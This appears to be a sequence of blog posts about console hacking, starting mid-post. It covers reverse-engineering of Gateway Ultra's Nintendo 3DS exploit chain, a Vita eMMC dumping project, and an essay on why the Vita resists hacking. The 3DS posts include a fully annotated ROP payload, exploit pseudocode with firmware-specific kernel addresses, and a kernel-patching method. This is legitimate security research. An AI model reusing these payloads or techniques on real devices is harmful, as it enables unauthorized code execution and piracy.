  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0x20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.

Now if we replace the code at 0x18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

...
  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10
...

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.

Closing

Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.

Pseudocode

Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct // example for 4.1.0
{
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
} fw_specific_data;

void payload() // base at 0x08F01000
{
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
    {
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
    }

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
    {
        memcpy (data, 0x08F028D8, 0x44);
    }
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
    {
        memcpy (data, 0x08F0291C, 0x44);
    }
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
    {
        memcpy (data, 0x08F02960, 0x44);
    }
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
    {
        memcpy (data, 0x08F029A4, 0x44);
    }
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
    {
        memcpy (data, 0x08F029E8, 0x44);
    }
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
    {
        memcpy (data, 0x08F02A2C, 0x44);
    }
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
    {
        memcpy (data, 0x08F02A70, 0x44);
    }
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
    {
        memcpy (data, 0x08F02AB4, 0x44);
    }

    // part 3, execute code
    do
    {
        // if the function has it's original code, we try again
        code_not_copied = *(unsigned int *)data->payload_code + data->orig_code == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    (void(*)() 0x009D2000)();
    // I think it was originally data->payload_code but later they hard coded it 
    // for some reason
}

Details

The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that is it in the VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the use of setting 0x08000838 to some location in the payload that is filled with “0x002CAFE4″. In the second part, version specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and stuff).

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of the physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS) but when the physical address of the same location is written to by the GPU, it does not go through the CPU’s MMU (since it is a different device) and can write to it. The need for thread sleep (and maybe the weird useless memcpys) is because the CPU’s various levels of cache needs some time to see the changes that it did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

It is a huge mess, but for those who are curious, here it is. The bulk of the code are useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that do 1) memory loads, 2) memory stores, 3) set flags, or 4) function call. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Reversing Gateway Ultra First Stage (Part 1)

And now for something completely different…

As a break from Vita hacking, I’ve decided to play around with the Nintendo 3DS exploit released by Gateway yesterday. The 3DS is a much easier console to hack, but unfortunately, the scene is dominated by a piracy company who, ironically, implement various “features” to protect their intellectual property (one such feature purposely bricks any user of a cloned piracy cart–and also “legitimate” users too). Ethics aside, it would be useful to reverse Gateway’s exploits and use them for homebrew loading so I took a quick look at it. The first stage of the exploit is an entry-point into the system that allows code to run in the unprivileged user-mode. It is usually used to exploit a kernel vulnerability, which is the second stage. In the unique case of Gateway, the first stage is broken up into two parts (in order for them to obfuscate their payload). I am only going to look at the first part for now.

Vulnerability

The userland vulnerability is a known use-after-free bug in WebKit found in April last year (and no, the latest Vita firmware is not vulnerable). Depending on the user-agent of the 3DS visiting the exploit page, a different payload for that browser version is sent. A GBATemp user has dumped all the possible payloads, and I used the 4.x one in my analysis (although I believe the only difference in the different payloads are memory offsets).

Details

This is what the initial first stage payload does:

void *_this = 0x08F10000;
int *read_len = 0x08F10020;
int *buffer = 0x08F01000;
int state = 0;
int i = 0;
FS_MOUNTSDMC("dmc:");
IFile_Open(_this, L"dmc:/Launcher.dat", 0x1);
*((int *)_this + 1) = 0x00012000; // fseek according to sm on #3dsdev
IFile_Read(_this, read_len, buffer, 0x4000);

for (i = 0; i < 0x4000/4; i++)
{
    state += 0xD5828281;
    buffer[i] += state;
}

The important part here is that the rest of the payload is decrypted from “Launcher.dat” by creating a stream cipher from a (crappy) PRNG that just increments by 0xD5828281 every iteration. Instead of an xor-pad, it uses an “add”-pad. Otherwise it is pretty standard obfuscation. A neat trick in this ROP payload is the casting of ARM code as Thumb to get gadgets that were not originally compiled into code (I am unsure if they also tried casting RO data as Thumb code, as that is also a way of getting extra gadgets). Another neat trick is emulating loops by using ARM conditional stores to conditionally set the stack pointer to some value (although I was told they used this trick in the original Gateway payload too).

Future

The first part was very simple and straightforward and was easy to reverse. I am expecting that the second part would involve a lot more code so I may need to work on a tool to extract the gadgets from code. (By the way, thanks to sbJFn5r on #3dsdev for providing me with the WebKit code to look at and sm for the hint about fseek). It is likely that I won’t have the time to continue this though (still working on the Vita) but it seems like many others are farther ahead than me anyways.

Payload

For those who care, the raw (annotated) payload for 4.X:

0x08B47400: 0x0010FFFD ; (nop) POP {PC}
0x08B47404: 0x0010FFFD ; (nop) POP {PC}
0x08B47408: 0x0010FFFD ; (nop) POP {PC}
0x08B4740C: 0x0010FFFD ; (nop) POP {PC}
0x08B47410: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47414: 0x002A5F27 ; R0 = "dmc:"
0x08B47418: 0x00332BEC ; FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
0x08B4741C: 0x08B475F0 ; R3, dummy
0x08B47420: 0x00188008 ; R4, dummy
0x08B47424: 0x001DA00C ; R5, dummy
0x08B47428: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B4742C: 0x08F10000 ; R0 = this
0x08B47430: 0x08B47630 ; R1 = L"dmc:/Launcher.dat"
0x08B47434: 0x00000001 ; R2 = read/only
0x08B47438: 0x0039B020 ; R3, dummy
0x08B4743C: 0x001CC01C ; R4, dummy
0x08B47440: 0x002C6010 ; R7, dummy
0x08B47444: 0x0025B0A8 ; IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
0x08B47448: 0x00231FF0 ; R4, dummy
0x08B4744C: 0x002CBFF0 ; R5, dummy
0x08B47450: 0x00124000 ; R6, dummy
0x08B47454: 0x0033FFFD ; R7, dummy
0x08B47458: 0x0010FFFD ; (nop) POP {PC}
0x08B4745C: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47460: 0x00012000 ; R0
0x08B47464: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47468: 0x08F10004 ; R1
0x08B4746C: 0x00140450 ; *(int*)0x08F10004 = 0x00012000, then LDMFD   SP!, {R4,PC}
0x08B47470: 0x001CC024 ; R4
0x08B47474: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B47478: 0x08F10000 ; R0 = this
0x08B4747C: 0x08F10020 ; R1 = p_total_read
0x08B47480: 0x08F01000 ; R2 = read_buffer
0x08B47484: 0x00004000 ; R3 = size
0x08B47488: 0x00295FF8 ; R4, dummy
0x08B4748C: 0x00253FFC ; R7, dummy
0x08B47490: 0x002FC8E8 ; IFile_Read, then LDMFD   SP!, {R4-R9,PC}
0x08B47494: 0x002BE030 ; R4, dummy
0x08B47498: 0x00212010 ; R5, dummy
0x08B4749C: 0x00271F40 ; R6, dummy
0x08B474A0: 0x0020C05C ; R7, dummy
0x08B474A4: 0x002DE0C4 ; R8, dummy
... START_DECODE_LOOP ...
0x08B474A8: 0x001B2000 ; R9, dummy || LR, dummy (upon loop)
0x08B474AC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474B0: 0x08B4750C ; R0 (&state)
0x08B474B4: 0x001CCC64 ; R0 = *R0 = state, LDMFD   SP!, {R4,PC}
0x08B474B8: 0x001057C4 ; R4, dummy
0x08B474BC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474C0: 0xD5828281 ; R1 (seed)
0x08B474C4: 0x00207954 ; R0 = R0 + R1, LDMFD   SP!, {R4,PC}
0x08B474C8: 0x0011FFFD ; R4, dummy
0x08B474CC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474D0: 0x08B4750C ; R1 (&state)
0x08B474D4: 0x00140450 ; *R1 = R0 = next random, LDMFD   SP!, {R4,PC}
0x08B474D8: 0x00354850 ; R4, dummy
0x08B474DC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474E0: 0x08B47618 ; R0 (&buffer)
0x08B474E4: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B474E8: 0x00127F6D ; R4, dummy
0x08B474EC: 0x00100D24 ; LDMFD   SP!, {R4-R6,PC}
0x08B474F0: 0x001037E0 ; R4, dummy
0x08B474F4: 0x08B4748C ; R5, dummy
0x08B474F8: 0x08B4740C ; R6, dummy
0x08B474FC: 0x001CCC64 ; R0 = *R0 (read32 from buffer), LDMFD   SP!, {R4,PC}
0x08B47500: 0x0011BB00 ; R4, dummy
0x08B47504: 0x0010FFFD ; (nop) POP {PC}
0x08B47508: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B4750C: 0x00000000 ; R1 (PRG state)
0x08B47510: 0x00207954 ; R0 = R0 + R1 (add PRG state to buffer data), LDMFD   SP!, {R4,PC}
0x08B47514: 0x001303A0 ; R4, dummy
0x08B47518: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B4751C: 0x00101434 ; R4, dummy
0x08B47520: 0x0022FF64 ; R5, dummy
0x08B47524: 0x001303A0 ; R6, dummy
0x08B47528: 0x08B47400 ; R7, dummy
0x08B4752C: 0x0010FFFD ; R8, dummy
0x08B47530: 0x0010FFFD ; R9, dummy
0x08B47534: 0x00100B5C ; R10, dummy
0x08B47538: 0x0022FE44 ; R11, dummy
0x08B4753C: 0x0010FFFD ; R12, (nop) POP {PC}
0x08B47540: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}, BX R12
0x08B47544: 0x001057C4 ; R4, dummy
0x08B47548: 0x00228AF4 ; R5, dummy
0x08B4754C: 0x00350658 ; R6, dummy
0x08B47550: 0x0010FFFD ; LR, (nop) POP {PC}
0x08B47554: 0x00158DE7 ; R1 = R0 = (decoded data), BLX LR
0x08B47558: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B4755C: 0x08B47618 ; R0 (&buffer)
0x08B47560: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B47564: 0x0011FFFD ; R4, dummy
0x08B47568: 0x00119B94 ; *R0 = R1 = (decoded data), LDMFD   SP!, {R4,PC}
0x08B4756C: 0x00106694 ; R4, dummy
0x08B47570: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47574: 0x00000004 ; R1
0x08B47578: 0x00207954 ; R0 = R0 + R1 (buffer + 4), LDMFD   SP!, {R4,PC}
0x08B4757C: 0x00130344 ; R4, dummy
0x08B47580: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47584: 0x08B47618 ; R1 (&buffer)
0x08B47588: 0x00140450 ; *R1 = R0 (set new buffer), LDMFD   SP!, {R4,PC}
0x08B4758C: 0x00100D24 ; R4, dummy
0x08B47590: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47594: 0xF70FB000 ; R1
0x08B47598: 0x00207954 ; R0 = R0 + R1 = 0xFFFFC004, LDMFD   SP!, {R4,PC}
0x08B4759C: 0x00119864 ; R4, dummy
0x08B475A0: 0x001B560C ; SET_FLAGS (R0 != 0), if (flags) R0 = 1, LDMFD   SP!, {R3,PC}
0x08B475A4: 0x002059C0 ; R3, dummy
0x08B475A8: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B475AC: 0x08B47610 ; R0 (val for LR)
0x08B475B0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475B4: 0x08F00FFC ; R1
0x08B475B8: 0x00119B94 ; *R0 = R1 = 0x08F00FFC (next stage), LDMFD   SP!, {R4,PC}
0x08B475BC: 0x00355FD4 ; R4, dummy
0x08B475C0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475C4: 0x08B474A8 ; R1
0x08B475C8: 0x0020E780 ; if (flags) *R0 = R1 = 0x08B474A8 (loop), LDMFD   SP!, {R4,PC}
0x08B475CC: 0x002C2215 ; R4, dummy
0x08B475D0: 0x0010FFFD ; (nop) POP {PC}
0x08B475D4: 0x0010FFFD ; (nop) POP {PC}
0x08B475D8: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B475DC: 0x002D5654 ; R4, dummy
0x08B475E0: 0x00103778 ; R5, dummy
0x08B475E4: 0x002FA864 ; R6, dummy
0x08B475E8: 0x00119B94 ; R7, dummy
0x08B475EC: 0x0020E780 ; R8, dummy
0x08B475F0: 0x00128605 ; R9, dummy
0x08B475F4: 0x00103DA8 ; R10, dummy
0x08B475F8: 0x08B475F8 ; R11, dummy
0x08B475FC: 0x0010FFFD ; R12, dummy
0x08B47600: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}
0x08B47604: 0x0010FFFD ; R4, dummy
0x08B47608: 0x002FC8E4 ; R5, dummy
0x08B4760C: 0x001037E0 ; R6, dummy
0x08B47610: 0x0023C494 ; LR (later set to 0x08B474A8)
0x08B47614: 0x002D6A30 ; SP = LR, LDMFD   SP!, {LR,PC}
... END OF ROP PAYLOAD ...
0x08B47618: 0x08F01000 ; buffer
0x08B4761C: 0x002D6A1C ; 
0x08B47620: 0x08B47400 ; 
0x08B47624: 0x0010FFFD ; 
0x08B47628: 0x0010FFFD ; 
0x08B4762C: 0x002D6A1C ; 
0x08B47630: L"dmc:/Launcher.dat"
0x08B47654: 0x00000000 ; 
0x08B47658: 0x00000000 ; 
0x08B4765C: 0x00000000 ; 
0x08B47660: 0x00000000 ; 
0x08B47664: 0x00000000 ; 
0x08B47668: 0x00000000 ; 
0x08B4766C: 0x002D6A1C ; 
0x08B47670: 0x00000000 ; 
0x08B47674: 0x00000000 ; 
0x08B47678: 0x00000000 ; 
0x08B4767C: 0x00000000 ; 
0x08B47680: 0x00000000 ; 
0x08B47684: 0x00000000 ; 
0x08B47688: 0x00000000 ; 
0x08B4768C: 0x00000000 ; 
0x08B47690: 0x00000000 ; 
0x08B47694: 0x00000000 ; 
0x08B47698: 0x00000000 ; 
0x08B4769C: 0x00000000 ; 
0x08B476A0: 0x00000000 ; 
0x08B476A4: 0x00000000 ; 
0x08B476A8: 0x00000000 ; 
0x08B476AC: 0x00000000 ; 
0x08B476B0: 0x00000000 ; 
0x08B476B4: 0x00000000 ; 
0x08B476B8: 0x00000000 ; 
0x08B476BC: 0x00000000 ; 
0x08B476C0: 0x00000000 ; 
0x08B476C4: 0x00000000 ; 
0x08B476C8: 0x00000000 ; 
0x08B476CC: 0x00000000 ; 
0x08B476D0: 0x00000000 ; 
0x08B476D4: 0x00000000 ; 
0x08B476D8: 0x00000000 ; 
0x08B476DC: 0x00000000 ; 
0x08B476E0: 0x00000000 ; 
0x08B476E4: 0x00000000 ; 
0x08B476E8: 0x00000000 ; 
0x08B476EC: 0x00000000 ; 
0x08B476F0: 0x00000000 ; 
0x08B476F4: 0x00000000 ; 
0x08B476F8: 0x00000000 ; 
0x08B476FC: 0x00000000 ; 

Dumping the Vita NAND

When we last left off, I had spent an excess of 100 hours (I’m not exaggerating since that entire time I was working, I listened to This American Life and went through over a hundred one-hour episodes) soldering and tinkering with the Vita logic board to try to dump the eMMC. I said I was going to buy a eMMC socket from taobao (the socket would have let me clamp a eMMC chip down while pins stick out, allowing the pressure to create a connection) however, I found out that all the sellers of the eMMC socket from taobao don’t ship to the USA and American retailers sell the sockets for $300 (cheapest I could find). So I took another approach.

Packet Sniffing

My first hypothesis on why it is not working is that there’s some special initialization command that the eMMC requires. For example, CMD42 of the MMC protocol allows password protection on the chip. Another possibility was that the chip resets into boot mode, which the SD card reader doesn’t understand. To clear any doubts, I connected CLK, CMD, and DAT0 to my Saleae Logic clone I got from eBay.

Vita eMMC points connected to logic analyzer.

Vita eMMC points connected to logic analyzer.

As you can see from the setup, I had the right controller board attached so I can get a power indicator light (not required, but useful). I also took the power button out of the case and attached it directly. The battery must be attached for the Vita to turn on. Everything is Scotch-taped to the table so it won’t move around. Once all that is done, I captured the Vita’s eMMC traffic on startup.

First command sent to eMMC on startup

First command sent to eMMC on startup

After reading the 200 paged specifications on eMMC, I understood the protocol and knew what I was looking at. The very first command sent to the Vita is CMD0 with argument 0x00000000 (GO_IDLE_STATE). This is significant for two reasons. First, we know that the Vita does NOT use the eMMC’s boot features. The Vita does not have its first stage bootloader on the eMMC, and boots either from (most likely) an on-chip ROM or (much less likely) some other chip (that mystery chip on the other side maybe?). Second, it means that there’s no trickery; the eMMC is placed directly into Idle mode, which is what SD cards go into when they are inserted into a computer. This also means that the first data read from the eMMC is in the user partition (not boot partition), so the second or third stage loader must be in the user partition of the eMMC. For the unfamiliar, the user partition is the “normal” data that you can see at any point while the boot partition is a special partition only exposed in boot mode (and AFAIK, not supported by any USB SD card reader). Because I don’t see the boot partition used, I never bothered to try to dump it.

Dumping

I tried a dozen times last week on two separate Vita logic boards trying to dump the NAND with no luck. Now that I’m on my third (and final) Vita, I decided to try something different. First, I did not remove the resistors sitting between the SoC and eMMC this time. This is because I wanted to capture the traffic (see above) and also because I am much better at soldering now and the tiny points doesn’t scare me anymore. Second, because of my better understanding of the MMC protocol (from the 200 page manual I read), I no longer attempted to solder DAT1-DAT3 because that takes more time and gives more chance of error due to bad connections. I only connected CLK, CMD, and DAT0. I know that on startup, the eMMC is placed automatically into 1-bit read mode and must be switched to 4-bit (DAT0-DAT3) or 8-bit (DAT0-DAT7) read mode after initialization. My hypothesis is that there must be an SD card reader that followed the specification’s recommendation and dynamically choose the bus width based on how many wires can be read correctly (I also guessed that most readers don’t do this because SD cards always have four data pins). To test this, I took a working SD card, and insulated the pins for DAT1-DAT3 with tape. I had three SD card readers and the third one worked! I know that that reader can operate in 1-bit mode, so I took it apart and connected it to the Vita (CLK, CMD, DAT0, and ground).

As you can see, more tape was used to secure the reader.

As you can see, more tape was used to secure the reader.

I plugged it into the computer and… nothing. I also see that the LED read indicator on the reader was not on and a multimeter shows that the reader was not outputting any power either. That’s weird. I then put a working SD card in and the LED light turned on. I had an idea. I took the SD card and insulated every pin except Vdd and Vss/GND (taped over every pin) and inserted the SD card into the reader. The LED light came on. I guess there’s an internal switch that gets turned on when it detects a card is inserted because it tries to draw power (I’m not hooking up Vdd/Vss to the Vita because that’s more wires and I needed a 1.8V source for the controller and it’s just a lot of mess; I’m using the Vita’s own voltage source to power the eMMC). I then turned on the Vita, and from the flashing LED read light, I knew it was successful.

LED is on and eMMC is being read

LED is on and eMMC is being read

Analyzing the NAND

Here’s what OSX has to say about the eMMC:

Product ID: 0x4082
Vendor ID: 0x1e3d (Chipsbrand Technologies (HK) Co., Limited)
Version: 1.00
Serial Number: 013244704081
Speed: Up to 480 Mb/sec
Manufacturer: ChipsBnk
Location ID: 0x1d110000 / 6
Current Available (mA): 500
Current Required (mA): 100
Capacity: 3.78 GB (3,779,067,904 bytes)
Removable Media: Yes
Detachable Drive: Yes
BSD Name: disk2
Partition Map Type: Unknown
S.M.A.R.T. status: Not Supported

I used good-old “dd” to copy the entire /dev/rdisk2 to a file. It took around one and a half hours to read (1-bit mode is very slow) the entire eMMC. I opened it up in a hex editor and as expected the NAND is completely encrypted. To verify, I ran a histogram on the dump and got the following result: 78.683% byte 0xFF and almost exactly 00.084% for every other byte. 0xFF blocks indicate free space and such an even distribution of all the other bytes means that the file system is completely encrypted. For good measure, I also ran “strings” on it and could not find any readable text. If we assume that there’s a 78.600% free space on the NAND (given 0xFF indicates free space and we have an even distribution of encrypted bytes in non-free space), that means that 808.70MB of the NAND is used. That’s a pretty hefty operating system in comparison to PSP’s 21MB flash0.

What’s Next

It wasn’t a surprise that the eMMC is completely encrypted. That’s what everyone suspected for a while. What would have been surprising is if it WASN’T encrypted, and that tiny hope was what fueled this project. We now know for a fact that modifying the NAND is not a viable way to hack the device, and it’s always good to know something for sure. For me, I learned a great deal about hardware and soldering and interfaces, so on my free time, I’ll be looking into other things like the video output, the mystery connector, the memory card, and the game cards. I’ve also sent the SoC and the two eMMC chips I removed to someone for decapping, so we’ll see how that goes once the process is done. Meanwhile, I’ll also work more with software and try some ideas I picked up from the WiiU 30C3 talk. Thanks again to everyone who contributed and helped fund this project!

Accounting

In the sprit of openness, here’s all the money I’ve received and spent in the duration of this hardware hacking project:

Collected: $110 WePay, $327.87 PayPal, and 0.1BTC

Assets

Logic Analyzer: $7.85
Broken Vita logic board: $15.95
VitaTV x 2 (another for a respected hacker): $211.82
Rework station: $80
Broken 3G Vita: $31
Shipping for Chips to be decapped: $1.86

Total: $348.48 (I estimated/asked for $380)

I said I will donate the remaining money to EFF. I exchanged the 0.1BTC to USD and am waiting for mtgox to verify my account so I can withdraw it. $70 of donations will not be given to the EFF by the request of the donor(s). I donated $25 to the EFF on January 10, 2014, 9:52 pm and will donate the 0.1BTC when mtgox verifies my account (this was before I knew that EFF takes BTC directly).

Why hacking the Vita is hard (or: a history of first hacks)

It’s been about a year since I revealed the first userland Vita exploit and I still occasionally get messages asking “what happened” (not much) or “when can I play my downloaded games” (hopefully never) or “I want homebrew” (me too). While I don’t have anything new exploitwise (same problems as before: no open SDK, lack of interest in the development community, lack of time on my part), I do want to take the time and go over why it’s taking so long.

Where are the hackers?

A common (and valid) complaint I hear is that there is a lack of hackers (a word I hate) working on the Vita. The fail0verflow team has a great post about console hacking that applies just as well to the Vita. In short, there isn’t as much value to hacking a console now than before. Not too long ago, the PSP and DS were the only portable device people owned that plays games and, for many people, the only portable device they owned period. I had a DS Lite that I carried everywhere long before I had a smartphone. But then I got a smartphone (and so did everyone else). iPhones and Androids (and don’t forget Windows Phone) are the perfect platform for what we used to call homebrew. Indie developers who wanted to write a portable game no longer has to use a hacked PSP and an open SDK. Writing apps is much easier and much more profitable. Meanwhile users can play all the emulators they want on their Android phone or their jailbroken iPhone. The demand for hacked consoles shrunk dramatically with those two audiences gone. Plus with smartphones gaining a larger audience while the Vita barely sells (which by the way is a tragedy since it’s a pretty awesome console), a hacker can get a lot more attention (for for those who seek “donations”, a lot more money) spending time rooting phones that are coming out every month.

But [insert device here] was hacked very quickly, we just need more people working, right?

To some extent, that is true, but even with a large group of talented reverse engineers, I would not bet that the Vita would be hacked any time soon. To be clear here, when I say “hacked,” I refer to completely owning the device to the point that decryption keys are found and unsigned code can be run in kernel mode (or beyond). The problem is that even talented reverse engineers (who can read assembly code and find exploits) are out of luck when they don’t have the code to work with. I mentioned this circular problem before, but to restate it: you need to have access to the code before you can exploit it, and to get access to the code, you need to exploit it. But, if that’s the case, you ask, how would any device ever be hacked? That is why I believe that the first (real) hack of any device is the most important. Let’s look at some examples of “first hacks” and see why it doesn’t work with the Vita.

Insecure First Version

This is the most common situation. Let’s look at the PSP. The 1.00 firmware ran unsigned code out of the box. Someone found a way to access the filesystem, and saw that the kernel modules were unencrypted. They analyzed the kernel modules and found an exploit and owned the system. All it takes is to have an unreleased kernel exploit from one firmware version; then update to the next one; exploit it and dump the new kernel to find more exploits. Rinse and repeat.

Same with the iPhone. The first version(s) allowed you to read from the filesystem through iBoot. It was a matter of dumping the filesystem, analyzing the (unencrypted) binaries, and creating exploits. Plus, the kernel is from the same codebase as OSX, so analyzing it was not as difficult as looking at a new codebase.

The Vita however, has a fairly secure original firmware. No filesystem access (even to the memory card), proper encryption of things that do come out of the device, and very little areas of interaction in general (you have CMA and that’s pretty much it).

Similarities to other Devices

Most Android phones fall into this category. One Android root will most likely work across multiple manufactures. Plus, Android is open source, so it’s a matter of searching for an exploit. Once the device is rooted, someone has to find a way to dump the bootloader (which for many phones is just a matter of reading from a /dev/ endpoint), and analyze the bootloader for a way to root it.

The Kindle Touch (which I was the first to jailbreak), ran essentially the same software as the Kindle 3 and had a debugging console port.

The Vita has similarities to the PSP, but most of the system is different. With multitasking support, the Vita memory model is completely different from PSP and has proper abstraction of virtual memory. The Vita has NetBSD code, but the kernel is completely proprietary. No PSP exploit will work on the Vita.

Hardware Methods

This is usually the “last resort” because it takes the most skill and money to perform. This usually involves physically dumping the RAM with hardware to analyze the code. The most recently hacked console, 3DS had this done. I believe the first Wii hack was developed with a hardware RAM dumper. Many consoles had some kind of hardware analyzing done before the first hack is developed.

It would be very hard to do a hardware hack on the Vita. The system memory is on the same chip as the CPU, so you cannot try to piggyback the RAM. Plus anyone doing a hardware hack would have to have expert electrical engineering skills and access to expensive tools.

 

The story always starts with getting access to the code, then finding an exploit, and then using that exploit to get more code to find more exploits in the future. Most of the jailbreaks, roots, and hacks you see are developed with information gathered from a previous hack. I believe that Sony knows this and really made sure that their device does not suffer any of the flaws I listed. Lots of people make fun of Sony for not handing security well, but after spending countless hours on the Vita, I could honestly say that the Vita is one of the most secure devices I’ve ever seen. So far, they seem to have done everything well; using all the security features in modern computers and not trusting any code. But, as we learned countless times, nothing is completely secure.

EDIT: I’m seeing a lot of comments speculating that Vita slim or Vita TV may help hacking it. In my opinion, this is grasping at straws. There are no evidence that a minor revision of the console will magically create software or hardware holes.

Huawei E587 (T-Mobile 4G Sonic Hotspot): Information and rooting

